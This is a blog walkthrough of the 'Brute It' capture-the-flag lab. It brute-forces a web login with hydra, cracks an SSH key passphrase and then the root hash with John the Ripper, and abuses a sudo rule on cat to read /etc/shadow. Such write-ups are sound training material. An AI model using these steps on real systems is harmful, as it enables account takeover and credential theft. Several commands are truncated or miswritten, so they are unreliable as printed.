Brute It

Use sudo nmap to scan for open ports: sudo nmap -sS


22/tcp open  ssh

80/tcp open  http

Use dirb tool to uncover hidden directories on the web server:


Inspect the page and following clue will apear:

<!-- Hey john, if you do not remember, the username is admin -->

john could be a SSH username

Do a failed login attemt while inspecting the page, head to the network tab and then to the request tab. Click on the request payload to see the format used.

Use hydra to bruteforce the login page:

hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form “/admin/:user=^USER^&pass=^PASS^:F=invalid”

80][http-post-form] host:   login: admin   password: ******

Login to form page and the web flag will be shown and also a private RSA key

Copy the rsa key to a text file > ida_rsa

locate ssh2john and cp to your current folder and excute the program – python ida_rsa > id_rsa.hash

Crack the hash with: sudo john id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt

rockinroll       (ida_rsa)

ssh to the user john with the rsa key and passphrase: sh -i ida_rsa john@

cat user.txt to find for the flag

sudo -l to check what commands we can run with sudo:

 (root) NOPASSWD: /bin/cat

sudo cat /root/root.txt will get you the final flag

sudo cat /etc/shadow and copy the root password hash:


Use johntheripper to crack the hash: john -w=/usr/share/wordlists/rockyou.txt roothash

The root password is found

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Comments (



%d bloggers like this: